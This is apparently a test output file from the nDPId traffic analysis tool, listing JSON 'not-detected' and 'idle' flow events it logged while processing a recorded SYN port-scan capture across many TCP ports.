-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27355,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27356,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27356,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27355,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058405,"flow_last_seen":1278275058405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27355,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27356,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27356,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":58080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1337,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":58080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":58080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1408,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":58080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6881,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6881,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6881,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6881,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":749,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":749,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":749,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":749,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4848,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4848,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6901,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6901,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2809,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2809,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2811,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2811,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":765,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":765,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":765,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":765,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":777,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
